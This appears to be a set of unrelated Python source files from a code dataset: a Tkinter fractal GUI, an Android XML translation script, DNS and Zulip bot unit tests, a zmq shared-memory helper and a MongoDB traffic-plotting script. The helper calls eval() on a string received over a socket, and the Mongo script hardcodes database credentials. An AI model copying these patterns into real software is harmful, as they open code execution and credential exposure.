self.value_entry_fraccenterX=IntVar()\r\n        self.value_entry_fraccenterY=IntVar()\r\n\r\n        checkbox_red=Checkbutton(winMain,text=self.lang.param.checkbox_red,variable=self.value_checkbox_red)\r\n        checkbox_blue=Checkbutton(winMain,text=self.lang.param.checkbox_green,variable=self.value_checkbox_green)\r\n        checkbox_green=Checkbutton(winMain,text=self.lang.param.checkbox_blue,variable=self.value_checkbox_blue)\r\n\r\n        checkbox_red.pack(side=\"left\")\r\n        checkbox_blue.pack(side=\"left\")\r\n        checkbox_green.pack(side=\"left\")\r\n\r\n        button_exec=Button(winMain,text=self.lang.main_menu.exec_button, command=self.execFrac)\r\n        button_exec.pack(side=\"bottom\")\r\n\r\n        label_entry_zoom = Label(winMain, text=self.lang.param.zoom)\r\n        label_entry_zoom.pack(side=\"top\")\r\n\r\n        # Tkinter Entry widgets take textvariable=, not text=\r\n        entry_zoom=Entry(winMain,textvariable=self.value_entry_zoom,width=30)\r\n        entry_zoom.pack(side=\"bottom\")\r\n\r\n        label_entry_dimX = Label(winMain, text=self.lang.param.image_width)\r\n        label_entry_dimX.pack(side=\"bottom\")\r\n\r\n        entry_dimX=Entry(winMain,textvariable=self.value_entry_dimX,width=30)\r\n        entry_dimX.pack(side=\"bottom\")\r\n\r\n        label_entry_dimY = Label(winMain, text=self.lang.param.image_height)\r\n        label_entry_dimY.pack(side=\"bottom\")\r\n\r\n        entry_dimY=Entry(winMain,textvariable=self.value_entry_dimY,width=30)\r\n        entry_dimY.pack(side=\"bottom\")\r\n\r\n        label_entry_fraccenterX = Label(winMain, text=self.lang.param.fractal_center_x)\r\n        label_entry_fraccenterX.pack(side=\"bottom\")\r\n\r\n        entry_fraccenterX=Entry(winMain,textvariable=self.value_entry_fraccenterX,width=30)\r\n        entry_fraccenterX.pack(side=\"bottom\")\r\n\r\n        label_entry_fraccenterY = Label(winMain, text=self.lang.param.fractal_center_y)\r\n        label_entry_fraccenterY.pack(side=\"bottom\")\r\n\r\n        entry_fraccenterY=Entry(winMain,textvariable=self.value_entry_fraccenterY,width=30)\r\n        entry_fraccenterY.pack(side=\"bottom\")\r\n\r\n    def execFrac(self):\r\n        # Param comes from the star-import of M_param, so it is referenced directly\r\n        param=Param([self.value_checkbox_red.get(),self.value_checkbox_green.get(), self.value_checkbox_blue.get()],\r\n                    self.value_entry_zoom.get(),\r\n                    [self.value_entry_fraccenterX.get(),self.value_entry_fraccenterY.get()],\r\n                    DEF_IT_MAX,\r\n                    [self.value_entry_dimX.get(),self.value_entry_dimY.get()])\r\n        welcome_label = self.lang.main_menu.fractal_creation\r\n        self.img=makeFrac(param)\r\n        self.img.show()\r\n        displayed_img= ImageTk.PhotoImage(self.img)\r\n        label = Label(self._win, image=displayed_img)\r\n        label.image = displayed_img  # keep a reference so Tk does not garbage-collect it\r\n        label.pack()\r\n\r\n    def save(self):\r\n        # TODO: wait for the user to confirm the name before saving\r\n        msgBoxConfirm=Tk()\r\n        filename=StringVar()\r\n        entry_name=Entry(msgBoxConfirm,textvariable=filename,width=30)\r\n        entry_name.pack(side=\"left\")\r\n        self.img.save(DEF_FP+filename.get()+'.jpg')\r\n\r\n# Start the interface\r\nfenetre=MainGUI()\r\nfenetre._win.mainloop()\r\nfenetre._win.destroy()\r\n","sub_path":"V_MainGUI.py","file_name":"V_MainGUI.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"91692655","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport sys\nimport re\n\nfrom termcolor import colored\n\nlang_map = {\n 'spanish': 'es',\n 'french': 'fr',\n}\n\ntemplate_dir = 'template'\nsource_dir = 'source'\nresult_dir = 'target'\nlanguage_dir = 'language'\napp_name = None\nselect_lang = None\nlanguage_separator = '@@@'\nkey_not_find_tag = '#:#:#:#'\n\n\ndef usage():\n print(\"\"\"\n %s \n 先找要翻译的template目录, 再找准备好的language文件. 完成翻译, 在target目录中生成翻译好的xml.\n\n -h 查看帮助文档\n\n argv1 选择APP的template目录. 如: fitness\n argv2 选择要翻译成什么语言. 如: spanish\n \"\"\" % sys.argv[0])\n\n exit(1)\n\n\ndef get_app_name():\n n = 0\n app_list = []\n\n print('-------------------------------------')\n print('可选择的APP tempalte:')\n\n for dir in os.listdir(template_dir):\n print(' %d : %s' % (n, dir))\n app_list.append(dir)\n n += 1\n print('-------------------------------------')\n app_index = input(colored('你选择哪个APP template, 输入前面数字即可: ', 'green'))\n\n if n > 0:\n return app_list[int(app_index)]\n else:\n print('找不到模板template!')\n exit(1)\n\n\ndef get_lang():\n n = 0\n print('\\n-------------------------------------')\n print('可以翻译成哪些语言:')\n print(os.path.join(language_dir, app_name))\n lang_list = find_lang_list(os.path.join(language_dir, app_name))\n\n for lang in lang_list:\n print(' %d : %s' % (n, lang))\n n += 1\n print('-------------------------------------')\n select_lang_index = input(colored('要翻译成什么语言, 输入前面的数字即可: ', 'green'))\n\n if n > 0:\n return lang_list[int(select_lang_index)]\n else:\n print('找不到可用的翻译language文件!')\n exit(1)\n\n\ndef find_lang_list(app_language_dir):\n lang_list = []\n for dir in os.listdir(app_language_dir):\n if os.path.isdir(os.path.join(app_language_dir, dir)):\n find_lang_list(os.path.join(app_language_dir, dir))\n elif os.path.isfile(os.path.join(app_language_dir, dir)):\n lang_group = re.match(r'^([a-zA-Z]+)-.*.xml', dir)\n if lang_group and lang_group.group(1) not in lang_list:\n lang_list.append(lang_group.group(1))\n\n return lang_list\n\n\ndef load_language(load_lang_subfile):\n lang_kv = {}\n for file in os.listdir(load_lang_subfile):\n\n if os.path.isdir(os.path.join(load_lang_subfile, file)):\n load_lang_subfile = os.path.join(load_lang_subfile, file)\n load_language(os.path.join(load_lang_subfile, file))\n elif os.path.isfile(os.path.join(load_lang_subfile, file)):\n lang_group = re.match(r'([a-zA-Z]+)-(.*.xml)', file)\n if lang_group:\n stings_name = lang_group.group(2)\n else:\n continue\n\n if lang_kv.get(lang_group.group(2)) is None:\n lang_kv[lang_group.group(2)] = {}\n\n if lang_group.group(1) == select_lang:\n lang_fd = open(os.path.join(load_lang_subfile, file), 'r')\n for line in lang_fd:\n if len(line.split(language_separator, 1)) == 2:\n (k, v) = line.split(language_separator, 1)\n lang_kv[stings_name][k] = v.strip()\n return lang_kv\n\n\ndef write_target_xml(content, target_xml):\n dir = re.sub(r'%s[^/]*$' % os.sep, '', target_xml)\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\n target_xml_fd = open(target_xml, 'w')\n target_xml_fd.write(content)\n target_xml_fd.close()\n\n\ndef create_target_lang_dir(dir):\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\n\ndef translate():\n lang_kv = load_language(os.path.join(language_dir, app_name))\n\n for template_file in os.listdir(os.path.join(template_dir, app_name)):\n content = ''\n template_fd = open(os.path.join(template_dir, app_name, template_file), 'r')\n\n target_file = os.path.join(result_dir, app_name, 'values-%s' % lang_map.get(select_lang), template_file)\n 
for line in template_fd:\n            if '<string' not in line and '<item' not in line:\n                content += line\n                continue\n\n            key_group = re.match(r'.*(string|item).*name=\"([^\"]+)\"', line)\n            if key_group:\n                key = key_group.group(2)\n\n                if lang_kv.get(template_file).get(key) is None:\n                    lang_kv[template_file][key] = key_not_find_tag\n                    print(colored('key 不存在 -> %s : %s' % (target_file, line.strip()), 'red').strip())\n\n                string_list = re.split(r'>.*</', line)\n                content += string_list[0] + '>' + lang_kv.get(template_file).get(key) + '</' + string_list[1]\n\n        print(colored('生成 : %s' % target_file, 'green'))\n        write_target_xml(content, target_file)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) >= 2:\n        app_name = sys.argv[1]\n\n    if len(sys.argv) >= 3:\n        select_lang = sys.argv[2]\n\n    if app_name == '-h':\n        usage()\n\n    if app_name is None or not os.path.isdir(os.path.join(template_dir, app_name)):\n        app_name = get_app_name()\n\n    if select_lang is None or select_lang not in find_lang_list(os.path.join(language_dir, app_name)):\n        select_lang = get_lang()\n\n    print()\n    translate()\n\n\n############# change log ##############\n'''\n2017-9-25 18:00\n增加两个变量: language_separator , key_not_find_tag 方便以后更换这些特殊符号.\n\n'''\n\n","sub_path":"old/translate_0923:4_py/0924_gen_language_xml.py","file_name":"0924_gen_language_xml.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"13334201","text":"from unittest import mock, TestCase\n\nimport dns\n\nimport psl_dns\n\n\nclass TestBase(TestCase):\n def setUp(self):\n mock_resolver_class = mock.patch('dns.resolver.Resolver', autospec=True).start()\n self.mock_resolver = mock_resolver_class.return_value\n self.mock_resolver.query.return_value = [mock.create_autospec(dns.rdata.Rdata).return_value]\n self.addCleanup(mock.patch.stopall)\n\n self.psl = psl_dns.PSL()\n\n def get_mock_context_manager(self, value):\n if hasattr(value, '__call__'):\n return mock.patch.object(self.mock_resolver, 'query', side_effect=value)\n\n def _query_side_effect(_domain, rdatatype, **_):\n if isinstance(value, dict):\n records = value[rdatatype]\n else:\n records = value if isinstance(value, list) else [value]\n\n answers = []\n for record in records:\n answers.append(mock.create_autospec(dns.rdata.Rdata).return_value)\n answers[-1].to_text.return_value = record\n return answers\n\n return mock.patch.object(self.mock_resolver, 'query', side_effect=_query_side_effect)\n\n\nclass TestMisc(TestBase):\n def test_get_checksum(self):\n checksum = 'd205f587d61c6bbf05bec818776da1dd030ce68f2e8912fea732158b9a33cc54'\n with self.get_mock_context_manager('\"1556058819 {}\"'.format(checksum)):\n self.assertEqual(self.psl.get_checksum(), checksum)\n\n def test_nxdomain(self):\n with self.get_mock_context_manager(dns.resolver.NXDOMAIN):\n with self.assertRaises(psl_dns.exceptions.ResolverError):\n self.psl.query('iana.org', dns.rdatatype.PTR)\n\n def test_get_rules(self):\n mock_records = {dns.rdatatype.PTR: ['*.'], dns.rdatatype.TXT: ['\"*.ck\"', '\"!www.ck\"']}\n with self.get_mock_context_manager(mock_records):\n self.assertEqual(self.psl.get_rules('www.ck.'), {'!www.ck', '*.ck', '*'})\n self.mock_resolver.query.assert_called()\n\n\nclass TestGetPublicSuffix(TestBase):\n def assertGetPublicSuffix(self, domain, suffix):\n mock_answer = (suffix.rstrip('.') + '.').encode('idna').decode('ascii')\n with self.get_mock_context_manager(mock_answer):\n self.assertEqual(self.psl.get_public_suffix(domain), suffix)\n self.mock_resolver.query.assert_called()\n\n def test_ascii(self):\n self.assertGetPublicSuffix('io', 'io')\n self.assertGetPublicSuffix('dedyn.io', 'dedyn.io')\n self.assertGetPublicSuffix('desec.io', 'io')\n self.assertGetPublicSuffix('desec.io.', 'io.')\n\n # Also test lettercase normalization\n self.assertGetPublicSuffix('IO', 'io')\n self.assertGetPublicSuffix('s3.AmazonAWS.com', 's3.amazonaws.com')\n\n def test_punycode(self):\n self.assertGetPublicSuffix('www.xn--tsting-wxa.de.co.uk', 'co.uk')\n\n def test_unicode(self):\n self.assertGetPublicSuffix('www.tösting.co.uk', 'co.uk')\n self.assertGetPublicSuffix('www.xn--55qx5d.cn.', 'xn--55qx5d.cn.')\n self.assertGetPublicSuffix('www.公司.cn.', '公司.cn.')\n self.assertGetPublicSuffix('公司.cn', '公司.cn')\n\n def test_invalid_domain(self):\n with self.assertRaises(ValueError):\n self.psl.get_public_suffix('.')\n\n with self.assertRaises(ValueError):\n self.psl.get_public_suffix('.desec.io')\n\n def test_inconsistent_labels(self):\n with self.get_mock_context_manager('dedyn.io.'):\n with self.assertRaises(ValueError):\n self.psl.get_public_suffix('www.desec.io')\n\n\nclass TestIsPublicSuffix(TestBase):\n def assertIsPublicSuffix(self, domain, suffix, value):\n mock_answer = (suffix.rstrip('.') + '.').encode('idna').decode('ascii')\n with self.get_mock_context_manager(mock_answer):\n self.assertEqual(self.psl.is_public_suffix(domain), value)\n self.mock_resolver.query.assert_called()\n\n def 
test_ascii(self):\n self.assertIsPublicSuffix('io', 'io', True)\n self.assertIsPublicSuffix('dedyn.io', 'dedyn.io', True)\n self.assertIsPublicSuffix('desec.io', 'io', False)\n self.assertIsPublicSuffix('desec.io.', 'io', False)\n\n def test_punycode(self):\n self.assertIsPublicSuffix('www.xn--tsting-wxa.de.co.uk', 'co.uk', False)\n\n def test_unicode(self):\n self.assertIsPublicSuffix('www.tösting.co.uk', 'co.uk', False)\n self.assertIsPublicSuffix('www.公司.cn.', '公司.cn', False)\n self.assertIsPublicSuffix('公司.cn', '公司.cn', True)\n\n def test_given_suffix(self):\n self.assertTrue(self.psl.is_public_suffix('something.ck', 'something.ck'))\n self.assertFalse(self.psl.is_public_suffix('something.ck', 'something.ck.'))\n","sub_path":"psl_dns/tests/test_querier.py","file_name":"test_querier.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
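get_mock_context_manager above keys the fake DNS answers off the requested rdatatype via a side_effect function. A stripped-down, self-contained sketch of that pattern; the Resolver class and the fake table are illustrative stand-ins, not psl_dns objects.

from unittest import mock

class Resolver:
    def query(self, domain, rdatatype):
        raise RuntimeError('would hit the network')

resolver = Resolver()
fake = {'TXT': ['"*.ck"'], 'PTR': ['*.']}

# patch.object forwards side_effect to the MagicMock that replaces query,
# so the fake answer depends on the call arguments.
with mock.patch.object(resolver, 'query',
                       side_effect=lambda domain, rdatatype: fake[rdatatype]):
    print(resolver.query('www.ck.', 'TXT'))  # ['"*.ck"'], no network touched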
+{"seq_id":"471125642","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport json\n\nfrom unittest.mock import patch\nfrom requests.exceptions import HTTPError, ConnectionError\n\nfrom zulip_bots.test_lib import BotTestCase\n\nclass TestGiphyBot(BotTestCase):\n bot_name = \"giphy\"\n\n def test_normal(self):\n bot_response = '[Click to enlarge]' \\\n '(https://media4.giphy.com/media/3o6ZtpxSZbQRRnwCKQ/giphy.gif)' \\\n '[](/static/images/interactive-bot/giphy/powered-by-giphy.png)'\n\n with self.mock_config_info({'key': '12345678'}), \\\n self.mock_http_conversation('test_normal'):\n self.initialize_bot()\n self.assert_bot_response(\n message = {'content': 'Hello'},\n response = {'content': bot_response},\n expected_method='send_reply'\n )\n\n def test_no_result(self):\n with self.mock_config_info({'key': '12345678'}), \\\n self.mock_http_conversation('test_no_result'):\n self.initialize_bot()\n self.assert_bot_response(\n message = {'content': 'world without zulip'},\n response = {'content': 'Sorry, I don\\'t have a GIF for \"world without zulip\"! :astonished:'},\n expected_method='send_reply'\n )\n\n def test_403(self):\n with self.mock_config_info({'key': '12345678'}), \\\n self.mock_http_conversation('test_403'), \\\n self.assertRaises(HTTPError):\n self.initialize_bot()\n mock_message = {'content': 'Hello'}\n # Call the native handle_message here, since we don't want to assert a response,\n # but an exception.\n self.message_handler.handle_message(message={'content': 'Hello'},\n bot_handler=self.mock_bot_handler)\n\n def test_connection_error(self):\n with self.mock_config_info({'key': '12345678'}), \\\n patch('requests.get', side_effect=ConnectionError()), \\\n patch('logging.warning'):\n self.initialize_bot()\n self.assert_bot_response(\n message = {'content': 'world without chocolate'},\n response = {'content': ('Uh oh, sorry :slightly_frowning_face:, I '\n 'cannot process your request right now. But, '\n 'let\\'s try again later! :grin:')},\n expected_method='send_reply'\n )\n","sub_path":"zulip_bots/zulip_bots/bots/giphy/test_giphy.py","file_name":"test_giphy.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"91744874","text":"#from multiprocessing import shared_memory\r\nimport iso_numpy\r\nimport numpy\r\nimport SharedArray as sa\r\nimport cv2\r\nimport zmq\r\n\r\nimg_size = 1280*720*3\r\n\r\nshm_size = 1280*720*3*100\r\ntry:\r\n shm = sa.create(\"phase1\", shm_size)\r\nexcept:\r\n print(\"it exist, so we just attach\")\r\n shm = sa.attach(\"phase1\")\r\n\r\nindex_table = shm[0:100]#the beginning of index table\r\nrecord_table = shm[100:500]#the beginning of recotd table\r\ndata = shm[500:-1]#beginning address of the real data part\r\n\r\nport2 = \"5557\"\r\ncontext2 = zmq.Context()\r\nprint(\"Connecting to server...\")\r\nsocket2 = context2.socket(zmq.REQ)\r\nsocket2.connect (\"tcp://localhost:%s\" % port2)\r\n\r\n\r\nclass iso_object:\r\n def __init__(self,index,name = \"np\"):\r\n self.type = name\r\n self.index = index\r\n def __getitem__(self,index):\r\n np_src = shm2np(self.index)\r\n np_dst = np_src[index]\r\n index = get_free_index()\r\n np2shm(index,np_dst)\r\n return iso_object(index)\r\n\r\nclass iso_model:\r\n def __init__(self,index,name = \"pytorch\"):\r\n self.type = name\r\n self.index = index\r\n self.inputshape = self.getinputshape()\r\n def getinputshape(self):\r\n if(self.type == \"keras\"):\r\n socket2.send_string(\"keras.model.inputshape\")\r\n message = socket2.recv()\r\n arg_string = str(self.index)\r\n socket2.send_string(arg_string)\r\n message = socket2.recv().decode(\"utf-8\")\r\n return eval(message)\r\n\r\n\r\ndef shm2np(index):\r\n offset = index*img_size\r\n table_offset = (index)*4\r\n\r\n shape = record_table[table_offset:table_offset+4]\r\n length = shape[3]\r\n flat_arr = data[offset:offset+int(length)]\r\n np_array = numpy.reshape(flat_arr,shape[0:3].astype(numpy.int))\r\n tmp_img = cv2.convertScaleAbs(np_array)\r\n return tmp_img\r\n\r\n# @overload\r\n# def np2shm(iso_numpy):\r\n# index = iso_numpy.index\r\n\r\n# np_array = iso_numpy.np_array\r\n# print(np_array.shape)\r\n# if(len(np_array.shape)==3):\r\n# width,height,dim = np_array.shape\r\n# else:\r\n# width,height = np_array.shape\r\n# dim = 1\r\n\r\n# length = width*height*dim\r\n# flat_arr = np_array.flatten()\r\n# offset = (index)*img_size\r\n# data[offset:offset+length] = flat_arr[0:length]\r\n# table_offset = index*4\r\n# record_table[table_offset] = width\r\n# record_table[table_offset+1] = height\r\n# record_table[table_offset+2] = dim\r\n# record_table[table_offset+3] = length\r\n \r\n# @np2shm.overload\r\ndef np2shm(index,np_array):\r\n print(np_array.shape)\r\n if(len(np_array.shape)==3):\r\n width,height,dim = np_array.shape\r\n else:\r\n width,height = np_array.shape\r\n dim = 1\r\n\r\n length = width*height*dim\r\n flat_arr = np_array.flatten()\r\n offset = (index)*img_size\r\n data[offset:offset+length] = flat_arr[0:length]\r\n table_offset = index*4\r\n record_table[table_offset] = width\r\n record_table[table_offset+1] = height\r\n record_table[table_offset+2] = dim\r\n record_table[table_offset+3] = length\r\n\r\n\r\ndef get_free_index():\r\n k = 0\r\n index_table = shm[0:100]\r\n while(k < 100):\r\n if(index_table[k]==0):\r\n index_table[k]=1\r\n print(\"index: \"+str(k)+\" found\")\r\n return k\r\n k = k + 1\r\n print(\"cannot find free index\")\r\n return -1\r\n\r\n\r\ndef free_index(shm_name,index):\r\n shm = sa.attach(shm_name)\r\n shm[index] = 0 \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# class shmem_record():\r\n# def __init__(self,width,height,dimension):\r\n# self.width = width\r\n# self.height = height\r\n# self.dimension = dimension\r\n# self.length = 
width*height*dimension\r\n\r\n\r\n\r\n\r\n# class shm_phase():\r\n# def __init__(self,shm_name):\r\n# self.name = shm_name #name of the shared memory\r\n# self.size = 1280*720*3*100 #default size of shared memory\r\n# self.shm = sa.create(shm_name, self.size) #shared memory object\r\n# self.phase = 0 # represent the which phase this shared memory is for\r\n# self.connect_status = True #True if shared meem is connected\r\n \r\n# self.index_table = self.shm[0:100]#the beginning of index table\r\n# self.record_table = self.shm[100:500]#the beginning of recotd table\r\n# self.data = self.shm[500:-1]#beginning address of the real data part\r\n\r\n\r\n# def create(self,shm_name):\r\n# if(self.connect_status is False):\r\n# self.shm = sa.create(shm_name, size=self.size)\r\n# self.connect_status = True\r\n# self.name = shm_name\r\n# else:\r\n# print(\"shared memory has been created\")\r\n\r\n# def connect(self):\r\n# if(self.connect_status is True):\r\n# return self.shm\r\n# else:\r\n# self.shm = sa.attach(self.name)\r\n# self.connect_status = True\r\n# return self.shm\r\n \r\n# def disconnect(self):\r\n# # self.index_table.release()\r\n# # self.record_table.release()\r\n# # self.data.release()\r\n# # self.shm.close()\r\n# # self.shm.unlink()\r\n# self.connect_status = False\r\n\r\n# def np2shm(self,iso_numpy):\r\n\r\n# index = iso_numpy.index\r\n\r\n# np_array = iso_numpy.np_array\r\n# print(type(np_array))\r\n# width,height,dim = np_array.shape\r\n# length = width*height*dim\r\n# flat_arr = np_array.flatten()\r\n\r\n# offset = (index)*img_size\r\n# self.data[offset:offset+length] = flat_arr[0:length]\r\n\r\n# table_offset = index*4\r\n# self.record_table[table_offset] = width\r\n# self.record_table[table_offset+1] = height\r\n# self.record_table[table_offset+2] = dim\r\n# self.record_table[table_offset+3] = length\r\n# print(\"np2shm\")\r\n# print(self.record_table[0:4])\r\n \r\n# def shm2np(self,index):\r\n# offset = index*img_size\r\n# table_offset = (index)*4\r\n# print(\"shm2np\")\r\n# print(self.record_table[0:4])\r\n# shape = self.record_table[table_offset:table_offset+4]\r\n# print(shape)\r\n# length = shape[3]\r\n\r\n# flat_arr = self.data[offset:offset+int(length)]\r\n# np_array = numpy.reshape(flat_arr,shape[0:3].astype(numpy.int))\r\n# print(\"aaaaaa\")\r\n# print(len(np_array))\r\n# tmp_img = cv2.convertScaleAbs(np_array)\r\n# return tmp_img\r\n\r\n# def get_free_index(self):\r\n# k = 0\r\n# while(k < 100):\r\n# if(self.index_table[k]==0):\r\n# self.index_table[k]=1\r\n# return k\r\n# k = k + 1\r\n# print(\"cannot find free index\")\r\n# return -1\r\n \r\n# def free_index(self,index):\r\n# self.index_table[index]=0\r\n \r\n# def __del__(self):\r\n# sa.delete(self.name)\r\n# self.disconnect()\r\n\r\n\r\n","sub_path":"code/IsoPhase_lib/iso_main.py","file_name":"iso_main.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
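The record above packs flattened frames into fixed-size slots of one flat shared buffer and keeps each frame's (width, height, dim, length) in a side table. A pure-numpy sketch of that layout so the round trip can be tested without SharedArray; slot count, slot size, and names are illustrative.

import numpy as np

IMG_SLOT = 1280 * 720 * 3
buf = np.zeros(IMG_SLOT * 4)              # data region: 4 slots
table = np.zeros((4, 4), dtype=np.int64)  # per-slot (w, h, dim, length)

def store(index, arr):
    w, h, dim = arr.shape
    flat = arr.ravel()
    buf[index * IMG_SLOT : index * IMG_SLOT + flat.size] = flat
    table[index] = (w, h, dim, flat.size)

def load(index):
    w, h, dim, length = table[index]
    flat = buf[index * IMG_SLOT : index * IMG_SLOT + length]
    return flat.reshape(w, h, dim)

frame = np.random.rand(720, 1280, 3)
store(0, frame)
assert np.array_equal(load(0), frame)  # lossless round trip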
+{"seq_id":"650634683","text":"\"\"\" An example of how to insert a document \"\"\"\nimport os\nimport sys\nfrom pymongo import MongoClient\nfrom pymongo.errors import ConnectionFailure\nimport pandas as pd\nimport pymongo\nimport chart_studio.plotly as py\nimport plotly.graph_objs as go\nimport pytz\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n\ndef save2rabbitmq(doc):\n z = {'dt': doc['dt'],\n 'distance': doc['result']['taxi']['distance'],\n 'duration': doc['result']['taxi']['duration'],\n 'traffic_condition': doc['result']['traffic_condition'],\n 'distance4': doc['result']['routes'][0]['steps'][4]['distance'],\n 'duration': doc['result']['routes'][0]['steps'][4]['duration'],\n 'traffic_condition': doc['result']['routes'][0]['steps'][4]['traffic_condition']\n }\n print(z)\n\n\ndef save2mongo(dbname, collection, doc):\n try:\n hostname = os.getenv('HOSTNAME')\n # hostname = 'x'\n if hostname:\n c = MongoClient(os.getenv('DATABASE_URL'))\n print(\"cloud\")\n else:\n c = MongoClient(\n \"mongodb://user1:password1@localhost:27017/\" + dbname)\n print(\"local\")\n except ConnectionFailure as e:\n sys.stderr.write(\"Could not connect to MongoDB: %s\" % e)\n sys.exit(1)\n dbh = c[dbname]\n dbh[collection].insert(doc)\n print(\"Successfully inserted document: %s\" % doc)\n # save2rabbitmq(doc)\n\n\ndef findlast2dayLastYear(collection, title, normalDuration, years_delta, days_delta):\n normalDuration = float(normalDuration)\n try:\n hostname = os.getenv('HOSTNAME')\n # hostname = 'x'\n if hostname:\n db_url = os.getenv('DATABASE_URL')\n c = MongoClient(db_url)\n print(\"cloud \" + collection)\n else:\n c = MongoClient(\"mongodb://user1:password1@localhost:27017/testdb\")\n print(\"local \" + collection)\n except ConnectionFailure as e:\n sys.stderr.write(\"Could not connect to MongoDB: %s\" % e)\n sys.exit(1)\n dbh = c.get_database()\n\n tz = pytz.timezone('Asia/Shanghai')\n fmt_long = \"%Y-%m-%d %H:%M:%S\"\n dt2 = datetime.now(tz)\n print(dt2)\n title_time = dt2.strftime(fmt_long)\n dt2 = dt2.replace(hour=0, minute=0, second=0,\n microsecond=0) # Returns a copy\n print(dt2)\n dt1_start = dt2 + \\\n relativedelta(years=years_delta) + relativedelta(days=days_delta)\n print(dt1_start)\n dt1_end = dt1_start + relativedelta(days=1)\n print(dt1_end)\n\n utc = pytz.timezone('UTC')\n local_timezone = pytz.timezone('Asia/Shanghai')\n\n today = []\n z = dbh[collection] \\\n .find({\"dt\": {\"$gt\": dt2}},\n projection={\"dt\": 1, \"duration\": 1, \"traffic_condition\": 1}) \\\n .sort(\"dt\", pymongo.ASCENDING)\n for doc in z:\n dt = doc['dt']\n loc_dt = utc.localize(dt)\n duration = doc['duration'] / normalDuration\n shanghai_dt = loc_dt.astimezone(local_timezone)\n today.append({'dt': shanghai_dt.strftime(\n fmt_long), 'duration': duration})\n\n yesterday = []\n z = dbh[collection] \\\n .find({\"$and\": [{\"dt\": {\"$gt\": dt1_start}}, {\"dt\": {\"$lt\": dt1_end}}]},\n projection={\"dt\": 1, \"duration\": 1, \"traffic_condition\": 1}) \\\n .sort(\"dt\", pymongo.ASCENDING)\n for doc in z:\n dt = doc['dt']\n loc_dt = utc.localize(dt) + relativedelta(years=-\n years_delta) + relativedelta(days=-days_delta)\n duration = doc['duration'] / normalDuration\n shanghai_dt = loc_dt.astimezone(local_timezone)\n yesterday.append(\n {'dt': shanghai_dt.strftime(fmt_long), 'duration': duration})\n\n print(\"Successfully retrieved document: %d\" % z.count(True))\n # https://docs.mongodb.com/manual/reference/method/cursor.count/#cursor.count\n # applySkipLimit\n myplotly(yesterday, 
today, collection, title, title_time, True)\n\n\ndef findlast2dayYesterday(collection, title, normalDuration):\n normalDuration = float(normalDuration)\n try:\n hostname = os.getenv('HOSTNAME')\n # hostname = 'x'\n if hostname:\n db_url = os.getenv('DATABASE_URL')\n c = MongoClient(db_url)\n print(\"cloud \" + collection)\n else:\n c = MongoClient(\"mongodb://user1:password1@localhost:27017/testdb\")\n print(\"local \" + collection)\n except ConnectionFailure as e:\n sys.stderr.write(\"Could not connect to MongoDB: %s\" % e)\n sys.exit(1)\n dbh = c.get_database()\n\n tz = pytz.timezone('Asia/Shanghai')\n fmt_long = \"%Y-%m-%d %H:%M:%S\"\n dt2 = datetime.now(tz)\n print(dt2)\n title_time = dt2.strftime(fmt_long)\n dt2 = dt2.replace(hour=0, minute=0, second=0,\n microsecond=0) # Returns a copy\n print(dt2)\n dt1 = dt2 + relativedelta(days=-1)\n print(dt1)\n\n utc = pytz.timezone('UTC')\n local_timezone = pytz.timezone('Asia/Shanghai')\n\n today = []\n yesterday = []\n z = dbh[collection] \\\n .find({\"dt\": {\"$gt\": dt1}},\n projection={\"dt\": 1, \"duration\": 1, \"traffic_condition\": 1}) \\\n .sort(\"dt\", pymongo.ASCENDING)\n for doc in z:\n dt = doc['dt']\n loc_dt = utc.localize(dt)\n duration = doc['duration']/normalDuration\n if loc_dt < dt2:\n shanghai_dt = loc_dt.astimezone(local_timezone)\n shanghai_dt = shanghai_dt + relativedelta(days=1)\n yesterday.append(\n {'dt': shanghai_dt.strftime(fmt_long), 'duration': duration})\n else:\n shanghai_dt = loc_dt.astimezone(local_timezone)\n today.append({'dt': shanghai_dt.strftime(\n fmt_long), 'duration': duration})\n\n print(\"Successfully retrieved document: %d\" % z.count(True))\n # https://docs.mongodb.com/manual/reference/method/cursor.count/#cursor.count\n # applySkipLimit\n myplotly(yesterday, today, collection, title, title_time, False)\n\n\ndef myplotly(df1, df2, collection, title, max_dt, isLastYear):\n df1 = pd.DataFrame(df1)\n df2 = pd.DataFrame(df2)\n # https://plot.ly/python/line-and-scatter/\n # Line and Scatter Plots\n # mode=markers,lines+markers,lines\n\n name = u'昨天拥堵指数'\n if isLastYear:\n name = u'去年拥堵指数'\n\n trace1 = go.Scatter(\n x=df1['dt'],\n y=df1['duration'],\n name=name,\n line={\"dash\": 'dot'},\n marker={\"color\": 'rgb(0,0,255)'}\n )\n trace2 = go.Scatter(\n x=df2['dt'],\n y=df2['duration'],\n name=u'今天拥堵指数',\n line={\"width\": 4},\n marker={\"color\": 'rgb(0,255,0)'}\n )\n data = [trace1, trace2]\n layout = go.Layout(\n title=title + max_dt\n )\n fig = go.Figure(data=data, layout=layout)\n url = py.plot(fig, filename=collection,\n fileopt='overwrite', auto_open=False)\n print(url)\n\n\ndef main():\n user_doc = {\n \"username\": \"janedoe\",\n \"firstname\": \"Jane\",\n \"surname\": \"Doe\",\n \"dateofbirth\": datetime(1975, 1, 1),\n \"email\": \"janedoe74@example.com\",\n \"score\": 0\n }\n save2mongo('baidu', 'mycoll', user_doc)\n\n\nif __name__ == \"__main__\":\n years_delta = os.getenv('YEARS_DELTA')\n days_delta = os.getenv('DAYS_DELTA')\n findlast2dayLastYear(sys.argv[1], sys.argv[2],\n sys.argv[3], int(years_delta), 